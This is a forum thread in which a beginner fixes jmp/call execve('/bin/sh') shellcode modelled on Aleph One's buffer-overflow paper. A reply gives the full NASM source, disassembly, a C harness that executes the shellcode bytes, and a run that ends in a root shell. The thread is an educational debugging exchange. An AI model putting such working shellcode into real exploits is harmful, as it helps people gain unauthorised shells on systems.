Results 1 to 5 of 5

Thread: basic shellcode on backtrack?

  1. #1
    Just burned his ISO
    Join Date
    Jul 2010
    Posts
    3

    Default basic shellcode on backtrack?

    Wassup everyone, how's everyone tonight? Well I've begun exploration into the world of buffer overflows and the like but I'm having some trouble getting my own shellcode to run. I mean it's not really shellcode yet, but in attempting the jmp/call method described in aleph1's paper gives me segmentation faults on line 11 of my code.

    ASM (NASM) | section .text global _start - At_eternaty - 76rJiprD - Pastebin.com

    Im just wondering if it's a problem in my code or if backtrack has some kind of protection scheme for this? Not really sure, but any advice is greatly appreciated, thanks.

  2. #2
    Member
    Join Date
    Jan 2010
    Posts
    70

    Default Re: basic shellcode on backtrack?

    If the line number can be trusted, then you're segfaulting on

    mov byte [ebx+7], al ; *(char *)((char *)ebx+7) = ax & 0xF

    Which makes me wonder what the value of ebx is (ie: is it out of bounds?)

  3. #3
    Just burned his ISO
    Join Date
    Jul 2010
    Posts
    3

    Default Re: basic shellcode on backtrack?

    well since the call to jmpback is made, the return address of the call should be pushed on the stack, which is actually just the address to the /bin/sh string. so thats what should be in ebx but it seems like its not getting the value

  4. #4
    Member
    Join Date
    Jan 2010
    Posts
    70

    Default Re: basic shellcode on backtrack?

    NOTE: I've assembled and executed the shell code provided with no issues - using BT4 and ubuntu 10.04 x64 (with the multilib development libraries to support building 32-bit code).

    The following is my command to turn the asm into bytecode:
    Code:
    XXXXXXXXXX:~$ cat test.s 
    section .text
    
    global _start
    
    _start:
    jmp callback
    jmpback:
    pop ebx
    xor eax, eax
    
    mov byte [ebx+7], al
    mov dword [ebx+8], ebx
    mov dword [ebx+12], eax
    lea ecx, [ebx+8]
    
    lea edx, [ebx+12]
    
    mov al, 0x0b
    int 0x80
    
    callback:
    call jmpback
    string db "/bin/sh"
    XXXXXXXXXX:~$ nasm -f elf32 test.s 
    XXXXXXXXXX:~$ objdump -d test.o 
    
    test.o:     file format elf32-i386
    
    
    Disassembly of section .text:
    
    00000000 <_start>:
       0:	e9 16 00 00 00       	jmp    1b <callback>
    
    00000005 <jmpback>:
       5:	5b                   	pop    %ebx
       6:	31 c0                	xor    %eax,%eax
       8:	88 43 07             	mov    %al,0x7(%ebx)
       b:	89 5b 08             	mov    %ebx,0x8(%ebx)
       e:	89 43 0c             	mov    %eax,0xc(%ebx)
      11:	8d 4b 08             	lea    0x8(%ebx),%ecx
      14:	8d 53 0c             	lea    0xc(%ebx),%edx
      17:	b0 0b                	mov    $0xb,%al
      19:	cd 80                	int    $0x80
    
    0000001b <callback>:
      1b:	e8 e5 ff ff ff       	call   5 <jmpback>
    
    00000020 <string>:
      20:	2f                   	das    
      21:	62 69 6e             	bound  %ebp,0x6e(%ecx)
      24:	2f                   	das    
      25:	73 68                	jae    8f <string+0x6f>
    This gets the raw byte-code.

    Then, I turn it into an executable C program with:
    Code:
    XXXXXXXXXX:~$ cat shellcode.c
    char sc[] = {
    0xe9,0x16,0x00,0x00,0x00,0x5b,0x31,0xc0,0x88,0x43,0x07,0x89,0x5b,
    0x08,0x89,0x43,0x0c,0x8d,0x4b,0x08,0x8d,0x53,0x0c,0xb0,0x0b,0xcd,
    0x80,0xe8,0xe5,0xff,0xff,0xff,0x2f,0x62,0x69,0x6e,0x2f,0x73,0x68
    };
    
    typedef void (*f)();
    
    int main()
    {
        f func;
        func = (f)sc;
        func();
        return 0;
    
    }
    And execute, as:
    Code:
    XXXXXXXXXX:~$ gcc -o sc shellcode.c
    XXXXXXXXXX:~$ ./sc 
    sh-3.2# id
    uid=0(root) gid=0(root) groups=0(root)
    sh-3.2# exit
    exit
    Again, note I've tested on BT4 Final _AND_ ubuntu 10.04

  5. #5
    Just burned his ISO
    Join Date
    Jul 2010
    Posts
    3

    Default Re: basic shellcode on backtrack?

    thanks a lot for your reply. It cleared up a few things. Stupid me.. i was trying to assemble this code and run it from the shell rather than inside the stack. i didnt realize that the code section in protected mode is read only so thats why it was crashing when i was tryna add those values after the /bin/sh string.

Similar Threads

  1. Some very basic questions about BackTrack 4
    By starleaf1 in forum Beginners Forum
    Replies: 12
    Last Post: 02-02-2010, 01:30 PM
  2. Shellcode help- hex to opcode
    By Siph0n in forum OLD Tutorials and Guides
    Replies: 0
    Last Post: 05-26-2008, 06:25 PM
  3. shellcode help
    By godlike in forum OLD Newbie Area
    Replies: 1
    Last Post: 02-15-2008, 06:07 PM
  4. Backtrack basic usage
    By ntxploits in forum OLD BackTrack v2.0 Final
    Replies: 1
    Last Post: 12-30-2007, 02:17 PM
  5. Basic Linux/backtrack questions
    By krubb in forum OLD Newbie Area
    Replies: 5
    Last Post: 03-16-2007, 12:49 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •